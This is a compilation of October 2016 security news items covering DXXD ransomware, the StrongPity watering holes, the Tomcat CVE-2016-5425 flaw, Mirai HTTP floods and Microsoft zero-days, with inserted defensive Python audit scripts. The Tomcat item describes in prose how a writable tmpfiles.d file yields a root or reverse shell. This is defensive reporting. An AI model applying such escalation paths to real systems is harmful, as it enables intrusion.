The DXXD ransomware changes the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption and HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText registry values to display the following note.
“When you start Windows, Windows Defender works to help protect your PC by scanning for malicious or unwanted software.”
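As an added example (not from the article or from BleepingComputer), the following Python audits the two Winlogon values named above. On Windows it reads them with the standard winreg module; on other platforms it substitutes an empty constructed sample so the assessment logic still runs. The expected policy text and the heuristics (ransom contact e-mail, mention of the .dxxd extension, deviation from the text your policy sets) are assumptions.

```python
import sys

# Added example: audit Winlogon legal-notice values for ransom-note abuse.
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
NOTICE_VALUES = ("LegalNoticeCaption", "LegalNoticeText")

# Text the article reports DXXD writes into LegalNoticeText; used as a
# constructed indicator string for an exact match.
DXXD_NOTICE = ("When you start Windows, Windows Defender works to help protect "
               "your PC by scanning for malicious or unwanted software.")


def read_legal_notice() -> dict:
    """Return both Winlogon notice values (empty string when a value is unset)."""
    if sys.platform != "win32":
        # Constructed sample standing in for a live registry read.
        return {"LegalNoticeCaption": "", "LegalNoticeText": ""}
    import winreg
    result = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
        for name in NOTICE_VALUES:
            try:
                result[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                result[name] = ""
    return result


def assess_legal_notice(values: dict, expected_text: str = "") -> list:
    """Return a list of findings; empty means nothing suspicious.

    expected_text is the notice your own policy configures (assumed empty
    if the host should show none); any other content is worth a look."""
    findings = []
    text = values.get("LegalNoticeText", "") or ""
    caption = values.get("LegalNoticeCaption", "") or ""
    if text == DXXD_NOTICE:
        findings.append("LegalNoticeText matches the DXXD ransom-note text")
    if expected_text and text != expected_text:
        findings.append("LegalNoticeText differs from the configured policy text")
    if "@" in text or "@" in caption:
        findings.append("notice contains an e-mail address (ransom contact pattern)")
    if ".dxxd" in text.lower():
        findings.append("notice mentions the .dxxd extension")
    return findings


if __name__ == "__main__":
    for finding in assess_legal_notice(read_legal_notice()):
        print("FINDING:", finding)
```

On a fleet, run the same assessment from your endpoint agent or a scheduled task and alert on any non-empty result; a legal notice that suddenly changes on a server is a cheap early signal regardless of which family wrote it.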
The infection vector is still unclear; Abrams speculates that the threat is spread by abusing Remote Desktop Services.
“Based on information discovered, I believe that the ransomware developer is hacking into servers using Remote Desktop Services and brute forcing passwords. If you have been affected by the DXXD Ransomware, you should reset all the passwords for the affected machine.” wrote Lawrence Abrams.
According to Abrams, the author of the DXXD ransomware decided to taunt victims and the experts who help them by creating an account on BleepingComputer and claiming that a newer version of the threat is more difficult to decrypt. The developer also claimed to have exploited a zero-day vulnerability to compromise servers and deliver the malware.
As usual, let me discourage you from paying the ransom, because there is no guarantee that you will get your files back. Don’t forget to back up your data frequently and use anti-malware solutions. In this specific case, it could be better to disable Remote Desktop Protocol (RDP) and to block files running from the AppData/LocalAppData folders.
Malware for Macs can gain access to the webcam and microphone. The defence is a small utility, or black tape
12.10.2016 Živě Viruses
At the Virus Bulletin conference in Denver, security specialist and former NSA employee Patrick Wardle presented a macOS weakness that allows potential attackers to gain access to data from a MacBook's webcam and microphone.
At the firmware level, camera activity is signalled by the green LED lighting up, so disabling it would be very difficult, if not impossible. Attackers can, however, target the moments when the webcam and microphone are already in use during a Skype or FaceTime call. The user receives no indication that, besides the communication app, another piece of software is also using the webcam.
Malware tasked with obtaining a recording would therefore capture the stream intended for the legitimate communication app and then send it to the attacker's servers. As part of his presentation, Wardle therefore prepared a simple utility that monitors applications with access to webcam data, blocks any unauthorized attempts to obtain a recording and reports them via a system notification.
The OverSight application monitors applications that have access to recording devices and warns of new accesses
An even more effective method is the one chosen by Mark Zuckerberg: black insulating tape. No hacker, however skilled, can get around that measure.
ACSC Report – Australian Bureau of Meteorology hacked by foreign spies
12.10.2016 securityaffairs Hacking
A report published by the Australian Cyber Security Centre confirmed the Australian Bureau of Meteorology hack was powered by foreign cyber spies.
In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) had been hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate and water agency, the analog of the USA’s National Weather Service.
The supercomputer of the Australian Bureau of Meteorology targeted by the hackers is also used to provide weather data to defence agencies, so a compromise of its data could give a persistent attacker a significant advantage for numerous reasons.
Initial media reports blamed China for the cyber attack; in 2013 Chinese hackers had been accused by authorities of stealing the top-secret documents and plans of Australia’s new intelligence agency headquarters.
“China is being blamed for a major cyber attack on the computers at the Bureau of Meteorology, which has compromised sensitive systems across the Federal Government.” states the ABC. “The bureau owns one of Australia’s largest supercomputers and provides critical information to a host of agencies. Its systems straddle the nation, including one link into the Department of Defence at Russell Offices in Canberra.”
The systems at the Bureau of Meteorology process a huge quantity of information and weather data that is provided to various industries, including the military.
A cyber attack on such systems could represent a threat to national security.
New information has now been disclosed by the government’s Australian Cyber Security Centre, which on Wednesday published a report on the incident. The experts at the Australian Cyber Security Centre attributed “the primary compromise to a foreign intelligence service,” but did not name the culprit.
“We don’t narrow it down to specific countries, and we do that deliberately,” said the minister for cybersecurity, Dan Tehan. “But what we have indicated is that cyber espionage is alive and well,” he told ABC News 24. “We have to make sure that we’re taking all the steps necessary to keep us safe, because the threat is there. The threat is real. Cybersecurity is something that we, as a nation, have to take very seriously.”
The report confirms the presence of a malware in the system of the Australian Bureau of Meteorology. The national cyber security agency, Australian Signals Directorate (ASD), detected a Remote Access Tool (RAT) malware “popular with state-sponsored cyber adversaries,” and confirmed that the same malicious code was used to compromise other Australian government networks in the past.
“ASD identified evidence of the adversary searching for and copying an unknown quantity of documents from the Bureau’s network. This information is likely to have been stolen by the adversary.” reads the report.
Another interesting aspect of the report is the experts’ assessment of the terrorist cyber threat: they explained that the cyber capabilities of terrorists remain rudimentary.
“Apart from demonstrating a savvy understanding of social media and exploiting the internet for propaganda purposes, terrorist cyber capabilities generally remain rudimentary and show few signs of improving significantly in the near future,” states the report.
StrongPity APT – Waterhole attacks against Italian and Belgian users
12.10.2016 securityaffairs APT
Kaspersky published a report on the cyber espionage activities conducted by the StrongPity APT, which mostly targeted Italians and Belgians with watering hole attacks.
Experts from Kaspersky Lab have published a detailed report on the cyber espionage activities conducted by the StrongPity APT. The group is very sophisticated; its operations rely on watering hole attacks and malware to target users of software designed for encrypting data and communications.
The StrongPity APT targeted users in Europe, the Middle East and Northern Africa.
StrongPity set up the website ralrab.com to mimic the legitimate rarlab.com website and used it as a landing domain to deliver poisoned installers of popular software. The group compromised the sites of certified distributors in Europe in order to redirect users to ralrab.com, which hosted the trojanized version of the legitimate application.
The StrongPity group also set up a rogue TrueCrypt website hosted at true-crypt.com, which was used to redirect users from the software download site Tamindir. Kaspersky reported that StrongPity started setting up TrueCrypt-themed watering hole attacks in late 2015, but the company’s experts noticed a peak in the number of attacks this summer. The majority of the victims of this attack were located in Turkey, with some in the Netherlands.
Italian visitors of the legitimate distributor website winrar.it were redirected to trojanized WinRAR installers hosted from the winrar.it website itself.
“Over the course of a little over a week, malware delivered from winrar.it appeared on over 600 systems throughout Europe and Northern Africa/Middle East. Likely, many more infections actually occurred. Accordingly, the country with the overwhelming number of detections was in Italy followed by Belgium and Algeria. The top countries with StrongPity malware from the winrar.it site from May 25th through the first few days of June are Italy, Belgium, Algeria, Cote D’Ivoire, Morroco, France, and Tunisia.” states the report.
winrar[.]it StrongPity component geolocation distribution
In the arsenal of the StrongPity APT there are multiple components that allow attackers to gain complete control of the target system and effectively exfiltrate data from the machine. According to Kaspersky, the droppers used by the group were often signed with unusual digital certificates.
“Because we are talking about StrongPity watering holes, let’s take a quick look at what is being delivered by the group from these sites.” continues the report, which goes on to count the systems infected with StrongPity malware.
“When we count all systems from 2016 infected with any one of the StrongPity components or a dropper, we see a more expansive picture. This data includes over 1,000 systems infected with a StrongPity component. The top five countries include Italy, Turkey, Belgium, Algeria, and France.”
The group used a component that looks for encryption-supported software suites, including the SSH and telnet client Putty, the FTP tool FileZilla, remote connections manager mRemoteNG, Microsoft’s Mstsc remote desktop client, and the SFTP and FTP client WinSCP.
“When visiting sites and downloading encryption-enabled software, it has become necessary to verify the validity of the distribution site and the integrity of the downloaded file itself. Download sites not using PGP or strong digital code signing certificates need to re-examine the necessity of doing so for their own customers,” states the report.
According to Kurt Baumgartner, principal security researcher at Kaspersky Lab, the TTPs observed for the StrongPity APT are similar to those of another Russian threat actor known as Energetic Bear (aka Crouching Yeti or Dragonfly).
In 2014, Kaspersky published an interesting analysis of the Crouching Yeti group, which used a large network of hacked websites (219 domains) as command and control infrastructure. The vast majority of these websites were legitimate and were used to serve malware and instruct bot agents worldwide to collect information on target systems. Most of the 2,800 companies identified as victims of the attack were in the industrial/machinery market, and the most targeted countries were the United States, Spain, Japan and Germany.
”They ran vulnerable content management systems or vulnerable web applications. None of the exploits used to compromise the servers were known to be zero-day. None of the client side exploits re-used from the open source metasploit framework were zero-day.” states the report published by Kaspersky Lab.
The attackers used the following attack scheme to infect victims:
Spearphishing using PDF documents embedded with a flash exploit (CVE-2011-0611)
Trojanized software installers
Waterhole attacks using a variety of re-used exploits
Hurry up, fix the CVE-2016-5425 privilege escalation flaw in Apache Tomcat
12.10.2016 securityaffairs Vulnerebility
The security researcher Dawid Golunski reported a root privilege escalation in Apache Tomcat on RedHat-based distributions, tracked as CVE-2016-5425.
Apache Tomcat packages provided by the default repositories of RedHat-based distributions (i.e. CentOS, RedHat, OracleLinux, Fedora, etc.) create a tmpfiles.d configuration file with insecure permissions. The configuration file /usr/lib/tmpfiles.d/tomcat.conf can be modified by a member of the tomcat group or by a malicious web application deployed on Tomcat in order to trigger the issue, escalate privileges to root and compromise the system.
Depending on the specific machine, the execution of systemd-tmpfiles could also be triggered by other services, including cron jobs and startup scripts.
The impact of the flaw is serious considering that Apache Tomcat powers numerous large-scale web services across industries.
“The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage temporary files including their creation. Attackers could very easily exploit the weak permissions on tomcat.conf to inject configuration that creates a rootshell or remote reverse shell that allows them to execute arbitrary commands with root privileges.” wrote Golunski in a security advisory.
“Injected malicious settings would be processed whenever /usr/bin/systemd-tmpfiles gets executed. systemd-tmpfiles is executed by default on boot on RedHat-based systems through systemd-tmpfiles-setup.service service as can be seen below:”
The flaw could potentially be exploited by remote attackers in combination with a vulnerable web application hosted on Apache Tomcat if they managed to find a path traversal (i.e. in a file upload feature) or an arbitrary file write/append vulnerability. The attacker would just need to append settings to the /usr/lib/tmpfiles.d/tomcat.conf file to achieve code execution with root privileges.
“This vector could prove useful to attackers, for example if they were unable to obtain a tomcat-privileged shell/codeexec by uploading a .jsp webshell through a vulnerable file upload feature due to restrictions imposed by Tomcat security manager, or a read-only webroot etc. It is worth to note that systemd-tmpfiles does not stop on syntax errors when processing configuration files which makes exploitation easier as attackers only need to inject their payload after a new line and do not need to worry about garbage data potentially prepended by a vulnerable webapp in case of Arbitrary File Write/Append exploitation.” added Golunski.
Further information on the affected systems is available in the security advisory published by RedHat.
To address the CVE-2016-5425 flaw, update to the latest packages provided by your distribution or, as a workaround, adjust the permissions on the /usr/lib/tmpfiles.d/tomcat.conf file by removing write permission for the tomcat group.
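An added Python example (not Golunski's proof of concept, which is not reproduced here) that audits tmpfiles.d configuration files for the weak permissions behind CVE-2016-5425, so an administrator can confirm the workaround above took effect and catch any other group- or world-writable file that systemd-tmpfiles would process as root. The directory list, the expectation that such files are root-owned and the sample tomcat.conf line are assumptions.

```python
import os
import stat
import tempfile

# Added example: find tmpfiles.d files that a non-root user could modify.
# Directories assumed for a typical RedHat-based layout.
TMPFILES_DIRS = ("/etc/tmpfiles.d", "/run/tmpfiles.d", "/usr/lib/tmpfiles.d")


def unsafe_mode_bits(mode: int) -> list:
    """Names of the write bits that should never be set on a tmpfiles.d file."""
    problems = []
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def audit_tmpfiles_conf(path: str) -> dict:
    """Owner uid, octal permission bits and findings for a single file."""
    st = os.stat(path)
    problems = unsafe_mode_bits(st.st_mode)
    if st.st_uid != 0:
        problems.append("not owned by root")  # assumed policy for these files
    return {
        "path": path,
        "uid": st.st_uid,
        "mode": oct(stat.S_IMODE(st.st_mode)),
        "problems": problems,
    }


def audit_all(dirs=TMPFILES_DIRS) -> list:
    """Audit every *.conf under the given directories; missing dirs are skipped."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if name.endswith(".conf"):
                report = audit_tmpfiles_conf(os.path.join(d, name))
                if report["problems"]:
                    findings.append(report)
    return findings


def demo_with_constructed_file() -> dict:
    """Create a throwaway tomcat.conf with the insecure 0664 mode and audit it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "tomcat.conf")
        with open(path, "w") as fh:
            # constructed sample line, not the package's real content
            fh.write("d /var/cache/tomcat/temp 0770 tomcat tomcat -\n")
        os.chmod(path, 0o664)  # group-writable, as in the vulnerable package
        return audit_tmpfiles_conf(path)


if __name__ == "__main__":
    for report in audit_all():
        print(report["path"], report["mode"], ", ".join(report["problems"]))
    print(demo_with_constructed_file())
```

Run it as root after patching: an empty result from audit_all() means every tmpfiles.d file is root-owned and writable only by its owner, which is the state the workaround in the advisory aims for.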
Dawid Golunski also included a proof of concept code in his advisory.
Inside the DDoS attacks powered by large IoT botnets
12.10.2016 securityaffairs BotNet
Cloudflare firm has published a report that analyzes two recent attacks that were powered by large IoT botnets based on the Mirai Threat.
IoT botnets represent one of the most dangerous threats in the security landscape; recently we have witnessed cyber attacks powered by these infrastructures that reached a magnitude never seen before.
The recent DDoS attacks powered by IoT botnets hit target websites with HTTP traffic, in some cases reaching more than one million requests per second. These IoT botnets relied on the Mirai malware, specifically designed to scan the Internet for vulnerable IoT devices.
Cloudflare has published a report that analyzes two recent attacks that represent a sort of milestone in DDoS attacks, because the attackers switched from SYN flood- and ACK flood-based attacks at Layer 3 to HTTP-based attacks at Layer 7.
The company observed the DDoS attacks through its automatic DDoS mitigation systems, examining specific features of the attacks such as the number of HTTP requests per second.
Cloudflare confirmed that two attacks peaked at more than 1 million HTTP requests per second. In one case the DDoS attack involved more than 52,000 IP addresses peaking at 1.75 million requests per second.
“This attack continued for 15 minutes. Multiple recent attacks had >1 Mrps and lasted for minutes.” states the report published by Cloudflare.
“This particular attack peaked at 1.75 Mrps. It was composed of short HTTP requests (around 121 bytes per request), without anything unusual in the HTTP headers. The requests had a fixed Cookie header. We counted 52,467 unique IP addresses taking part in this attack.”
According to Cloudflare the attack was launched from hundreds of autonomous system networks, the biggest sources being in Ukraine (AS15895) and Vietnam (AS45899).
Cloudflare also reported data on a second attack that peaked at 360 Gbps and used longer HTTP requests.
The attack lasted roughly one hour and was launched from 128,833 unique IP addresses, with most of the attack traffic concentrated on Frankfurt.
“It’s the long payload sent after the request headers that allowed the attackers to generate substantial traffic. Since this attack we’ve seen similar events with varying parameters in the request body,” states Cloudflare. “Sometimes these attacks came as GET requests, sometimes as POST. Additionally, this particular attack lasted roughly one hour, with 128,833 unique IP addresses.”
Analysis of the IoT devices involved in both attacks revealed that they had port 23 (telnet) either open (closing the connection immediately) or closed, never filtered.
The vast majority of the IoT devices in the Vietnamese networks are connected CCTV cameras, most of them with port 80 open and presenting a “NETSurveillance WEB” page.
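An added Python example (not Cloudflare's code) that applies the same signals the report describes, requests per second, number of distinct source addresses and a fixed Cookie header, to web-server access logs, so a site operator can recognise a Layer 7 flood of this shape in its own logs. The log format, the thresholds and the sample lines are constructed for the example.

```python
import re
from collections import Counter, defaultdict

# Added example: Layer 7 flood detection over access-log lines.
# Assumed log format (constructed, not a real server's default):
#   <ip> [<timestamp>] "<method> <path> <proto>" <status> <request_bytes> "<cookie>"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<req_bytes>\d+) "(?P<cookie>[^"]*)"$'
)


def parse_line(line: str):
    """Return the parsed fields, or None for a line that does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines, rps_threshold: int, min_unique_ips: int) -> dict:
    """Count requests per second and flag seconds that exceed the threshold
    while coming from many distinct IPs (a botnet, not one noisy client).
    Also report a Cookie value shared by >90% of requests and the mean size."""
    per_second = Counter()
    ips_per_second = defaultdict(set)
    cookies = Counter()
    sizes = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        sec = rec["ts"]  # timestamp assumed to have one-second granularity
        per_second[sec] += 1
        ips_per_second[sec].add(rec["ip"])
        cookies[rec["cookie"]] += 1
        sizes.append(int(rec["req_bytes"]))
    flagged = {
        sec: {"rps": n, "unique_ips": len(ips_per_second[sec])}
        for sec, n in per_second.items()
        if n >= rps_threshold and len(ips_per_second[sec]) >= min_unique_ips
    }
    total = sum(per_second.values())
    top_cookie, top_count = cookies.most_common(1)[0] if cookies else ("", 0)
    return {
        "total": total,
        "peak_rps": max(per_second.values(), default=0),
        "flagged_seconds": flagged,
        "fixed_cookie": top_cookie if total and top_count / total > 0.9 else None,
        "avg_request_bytes": (sum(sizes) / len(sizes)) if sizes else 0.0,
    }


def build_sample() -> list:
    """Constructed log lines: three quiet seconds, then two seconds of a flood
    of short requests from 80 distinct addresses sharing one Cookie value."""
    lines = []
    for i in range(3):
        lines.append(f'203.0.113.{i + 1} [12/Oct/2016:10:00:0{i}] '
                     f'"GET /index.html HTTP/1.1" 200 5120 "session=u{i}"')
    for i in range(40):
        lines.append(f'198.51.100.{i + 1} [12/Oct/2016:10:00:05] '
                     f'"GET / HTTP/1.1" 200 121 "id=fixedvalue"')
    for i in range(40):
        lines.append(f'198.51.100.{i + 41} [12/Oct/2016:10:00:06] '
                     f'"GET / HTTP/1.1" 200 121 "id=fixedvalue"')
    return lines


if __name__ == "__main__":
    print(analyze(build_sample(), rps_threshold=30, min_unique_ips=20))
```

The thresholds are deliberately low so the constructed sample trips them; on a real site set rps_threshold well above the normal peak and min_unique_ips high enough that a single misbehaving client or proxy does not look like a botnet.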
What will happen in the future?
IoT devices will continue to be exploited by threat actors in the wild, “as more and more devices (fridges, fitness trackers, sleep monitors, …) are added to the Internet they’ll likely be unwilling participants in future attacks.”
It’s time to take the security of IoT devices seriously.
Searching for Best Encryption Tools? Hackers are Spreading Malware Through Fake Software
12.10.2016 thehackernews Virus
Over the past few years, Internet users globally have grown increasingly aware of online privacy and security issues due to mass monitoring and surveillance by government agencies, making them adopt encryption software and services.
But it turns out that hackers are taking advantage of this opportunity by creating and distributing fake versions of encryption tools in order to infect as many victims as possible.
Kaspersky Lab has revealed an advanced persistent threat (APT) group, nicknamed StrongPity, which has put a lot of effort into targeting users of software designed for encrypting data and communications.
The StrongPity APT group has been using watering-hole attacks, infected installers, and malware for many years to target users of encryption software by compromising legitimate sites or setting up their own malicious copycat sites.
Watering hole attacks are designed to lure specific groups of users to their interest-based sites that typically house malicious files or redirect them to attacker-controlled downloads.
The StrongPity APT group has managed to infect users in Europe, Northern Africa, and the Middle East and targeted two free encryption utilities in different attacks: WinRAR and TrueCrypt.
WinRAR and TrueCrypt have long been popular with security- and privacy-conscious users. WinRAR is best known for its archiving capabilities, which include encrypting files with AES-256, while TrueCrypt is a full-disk encryption utility that locks all files on a hard drive.
By setting up fake distribution sites that closely mimic legitimate download sites, StrongPity is able to trick users into downloading malicious versions of these encryption apps, in the hope that users will encrypt their data using a trojanized version of WinRAR or TrueCrypt, allowing attackers to spy on the data before it is encrypted.
"The problem with people depending on tools like this isn’t the strength of the crypto, but more about how it's distributed," says Kurt Baumgartner, principal security researcher at Kaspersky Lab. "This is that problem that StrongPity is taking advantage of."
Booby-Trapped WinRAR and TrueCrypt Downloads
The APT group first set up TrueCrypt-themed watering holes in late 2015, but its malicious activity surged at the end of summer 2016.
Between July and September, dozens of visitors were redirected from tamindir[.]com to true-crypt[.]com, with, unsurprisingly, almost all of the focus on computer systems in Turkey and some victims in the Netherlands.
In the WinRAR case, however, instead of redirecting victims to a website controlled by StrongPity, the group hijacked the legitimate winrar.it website to host a malicious version of the file themselves.
The winrar.it website infected users mostly in Italy, with some victims in countries like Belgium, Algeria, Tunisia, France, Morocco and Cote D'Ivoire, while the attacker-controlled site winrar.be infected users in Belgium, Algeria, Morocco, the Netherlands and Canada.
Top Countries infected with StrongPity APT malware
According to Kaspersky, more than 1,000 systems were infected with StrongPity malware this year. The top five countries affected by the group are Italy, Turkey, Belgium, Algeria and France.
The StrongPity APT's dropper malware was signed with "unusual digital certificates," but the group didn't re-use its fake digital certificates. The downloaded components include a backdoor, keyloggers, data stealers and modules targeting other crypto-related software programs, including the PuTTY SSH client, the FileZilla FTP client, the WinSCP secure file transfer program and remote desktop clients.
The dropper malware not only provides the hackers control of the system, but also allows them to steal disk contents and download other malware that would steal communication and contact information.
Therefore, users visiting sites and downloading encryption-enabled software are advised to verify both the validity of the distribution website as well as the integrity of the downloaded file itself.
Download sites that do not use PGP or a strong digital code signing certificate need to re-examine the necessity of doing so, for their own benefit as well as that of their customers, explained Baumgartner.
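An added Python example (not Kaspersky's or any vendor's tooling) covering the two checks recommended in both StrongPity write-ups on this page: that the download host exactly matches the vendor's domain rather than a look-alike such as ralrab.com for rarlab.com, and that the file's SHA-256 digest matches the value the vendor published out of band. The allowlist, the edit-distance threshold and the sample file are assumptions.

```python
import hashlib
import hmac
import os
import tempfile
from urllib.parse import urlsplit

# Added example: distribution-site and file-integrity checks for a download.
KNOWN_VENDOR_HOSTS = {"rarlab.com", "www.rarlab.com"}  # assumed allowlist


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot near-miss host names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(url: str, allowed=KNOWN_VENDOR_HOSTS) -> str:
    """'trusted' for an exact allowlisted host, 'lookalike' for a host within
    two edits of one (ralrab.com vs rarlab.com is two substitutions),
    'unknown' otherwise. Only 'trusted' should be accepted automatically."""
    host = (urlsplit(url).hostname or "").lower()
    if host in allowed:
        return "trusted"
    for good in allowed:
        if edit_distance(host, good) <= 2:
            return "lookalike"
    return "unknown"


def sha256_of_file(path: str) -> str:
    """Stream the file through SHA-256 so large installers do not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: str, expected_sha256: str) -> bool:
    """Compare the file digest with the published one in constant time."""
    return hmac.compare_digest(sha256_of_file(path).lower(), expected_sha256.lower())


def demo() -> dict:
    """Write a constructed 'installer', record its digest as if the vendor
    had published it, then append a byte to simulate a trojanized copy."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "winrar-setup.exe")
        with open(path, "wb") as fh:
            fh.write(b"MZ constructed installer bytes")  # constructed content
        published = sha256_of_file(path)  # stands in for the vendor's published hash
        before = verify_download(path, published)
        with open(path, "ab") as fh:
            fh.write(b"\x90")  # tampering: any change breaks the digest
        after = verify_download(path, published)
    return {"before": before, "after": after}


if __name__ == "__main__":
    for url in ("https://www.rarlab.com/download.htm",
                "http://ralrab.com/rar/winrar-x64.exe"):
        print(url, classify_host(url))
    print(demo())
```

The digest check only helps when the expected value comes from somewhere the attacker does not control (a signed release note, a vendor page reached by its exact known host), which is why the host check comes first; a hash published on the look-alike site itself proves nothing.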
Microsoft Patches 5 Zero-Day Vulnerabilities Being Exploited in the Wild
12.10.2016 thehackernews Vulnerebility
Microsoft has released its monthly Patch Tuesday update including a total of 10 security bulletins, and you are required to apply the whole package of patches at once, whether you like it or not.
That's because the company is kicking off a controversial new all-or-nothing patch model this month by packaging all security updates into a single payload, removing your ability to pick and choose which individual patches to install.
October's patch bundle includes fixes for at least 5 separate dangerous zero-day vulnerabilities in Internet Explorer, Edge, Windows and Office products that attackers were already exploiting in the wild before the patch release.
The patches for these zero-day flaws are included in MS16-118, MS16-119, MS16-120, MS16-121 and MS16-126. All the zero-days are being exploited in the wild, allowing attackers to execute a remote command on victim's system.
Although none of the zero-day flaws were publicly disclosed prior to Tuesday, the company was aware of attacks exploiting these flaws, said Microsoft.
Here's the list of Zero-Day Vulnerabilities:
CVE-2016-3298: An Internet Explorer zero-day flaw is a browser information disclosure vulnerability patched in MS16-118 bulletin among 11 other vulnerabilities. It could allow attackers to "test for the presence of files on disk."
CVE-2016-7189: A zero-day in the browser's scripting engine has been patched in Microsoft Edge bulletin, MS16-119, among others. The flaw is a remote code execution vulnerability.
CVE-2016-3393: Another zero-day in Microsoft Windows Graphics Component has been addressed in MS16-120 that could be exploited over the web, or via an email containing malicious file or over a file-sharing app to conduct RCE attack.
CVE-2016-7193: A single zero-day in Office has been addressed in MS16-121 bulletin. The flaw is a remote code execution vulnerability caused by the way Office handles RTF files.
CVE-2016-3298: The last publicly attacked zero-day has been patched in MS16-126, which is the only zero-day that is not rated critical, just moderate. The flaw is an information disclosure bug affecting Vista, Windows 7 and 8 and exists in the Microsoft Internet Messaging API.
Another bulletin rated critical is MS16-122 that patches a remote code execution flaw, CVE-2016-0142, in the Windows Video Control, affecting Windows Vista, 7, 8 and 10. The bug can be exploited when a user opens a crafted file or app from the web page or email.
Microsoft also patched twelve vulnerabilities in Adobe Flash Player for Windows 8.1, Windows 10, and Server 2012 in MS16-127.
The remaining bulletins, rated important or moderate, including MS16-123, MS16-124 and MS16-125, patch five elevation of privilege vulnerabilities in Windows Kernel-Mode, four elevation of privilege vulnerabilities in the Windows Registry, and an elevation of privilege flaw in Windows Diagnostics Hub respectively.
Adobe Patch Update
Adobe also released a new version of Flash Player today that patches a dozen vulnerabilities, most of which were remote code execution flaws.
Adobe has also published code clean-ups for 71(!) CVE-listed security flaws in Acrobat and Reader, along with a fix for a single elevation of privilege bug in Creative Cloud.
Users are advised to apply the Windows and Adobe patches to keep hackers and cybercriminals from taking control of their computers.
A system reboot is necessary for installing updates, so admins are advised to save work on PCs where the whole package of patches is deployed before initiating the process.
Yahoo Disables Email Auto-Forwarding; Making It Harder for Users to Move On
11.10.2016 thehackernews Cyber
Yahoo! has disabled automatic email forwarding -- a feature that lets its users forward a copy of incoming emails from one account to another.
The company has faced a lot of bad news regarding its email service in the past few weeks. Last month, the company admitted a massive 2014 data breach that exposed the account details of over 500 Million Yahoo users.
If this wasn't enough for users to quit the service, another shocking revelation came last week that the company scanned the emails of hundreds of millions of its users at the request of a U.S. intelligence service last year.
That's enough to make a loyal Yahoo Mail user switch to rival alternatives like Google's Gmail or Microsoft's Outlook.
Yahoo Mail Disables Auto-Forwarding; Making It Hard to Leave
But as Yahoo Mail users are trying to leave the email service, the company is making it more difficult for them to transition to another email service.
That's because, since the beginning of October, the company has disabled Yahoo Mail's automatic email forwarding feature, which would allow users to automatically redirect incoming emails from their Yahoo account to another account, as reported by the Associated Press.
All of a sudden it's under development? Here's what a post on the company's help page reads about the feature's status:
"This feature is under development. While we work to improve it, we've temporarily disabled the ability to turn on Mail Forwarding for new forwarding addresses. If you've already enabled Mail Forwarding in the past, your email will continue to forward to the address you previously configured."
In other words, only users who already had the feature turned ON in the past are spared this trouble; users who try to turn ON automatic email forwarding now have no option.
Yahoo has shared the following statement about the recent move:
"We're working to get auto-forward back up and running as soon as possible because we know how useful it can be to our users. The feature was temporarily disabled as part of previously planned maintenance to improve its functionality between a user’s various accounts. Users can expect an update to the auto-forward functionality soon. In the meantime, we continue to support multiple account management."
Yahoo is trying to save its Verizon Acquisition Deal
The move to turn off the email forwarding option could be an attempt to keep its customers' accounts active, because any damage to the company at this time matters greatly while Yahoo seeks to sell itself to Verizon.
The Yahoo acquisition deal has not yet closed, and Verizon Communications has reportedly asked for a $1 Billion discount off of Yahoo's $4.83 Billion sales price.
As a workaround, you could switch on your vacation responder instead to automatically reply to emails with a note about your new email address.
Delete Your Yahoo Account Before It's Too Late
You can also forego the forwarding process and simply delete your Yahoo Mail account entirely, until and unless Yahoo disables that option, too.
As The Reg reports, British Telecom customers, whose email had been outsourced to Yahoo, have not been able to set up automatic email forwarding or even access the option to delete their accounts.
"Sorry, the delete feature is currently unavailable. This feature will become available by the end of September," the error message reads.
So, hurry up before it gets too late.
Challenge! WIN $50,000 for Finding Non-traditional Ways to Detect Vulnerable IoT Devices
11.10.2016 thehackernews Safety
Challenge — WIN $50,000 for Discovering Non-traditional Ways to Find Vulnerable IoT Devices
If you are concerned about the insecurity of the Internet of Things, are good at programming and know how to hack smart devices, then you have an opportunity to earn $50,000 in prize money for discovering non-traditional ways to secure IoT devices.
The Internet of Things (IoT) market is going to expand rapidly over the next decade. We already have 6.5 billion to 8 billion IoT devices connected to the Internet worldwide, and the number is expected to reach 50 billion by 2020.
While IoT is going to improve life for many, the number of security risks due to the lack of stringent security measures and encryption mechanisms in these devices has increased exponentially.
This rise in the number of security risks will continue to widen the attack surface, giving hackers a large number of entry points to affect you in one way or another.
Recently, we saw a record-breaking DDoS attack (Distributed Denial of Service) against the France-based hosting provider OVH that reached over one Terabit per second (1 Tbps). The attack was carried out via a botnet of infected IoT devices, dubbed Mirai Malware.
So, the threat to and from IoT is big, and we have to look for a solution right now, because tomorrow it will be too late.
We already have some ways to find vulnerable IoT devices, like the Shodan and Censys search engines. While Shodan has been designed specifically to locate any devices that have been carelessly plugged into the Internet, Censys employs a more advanced approach to finding vulnerabilities in the devices by scanning the whole Internet daily.
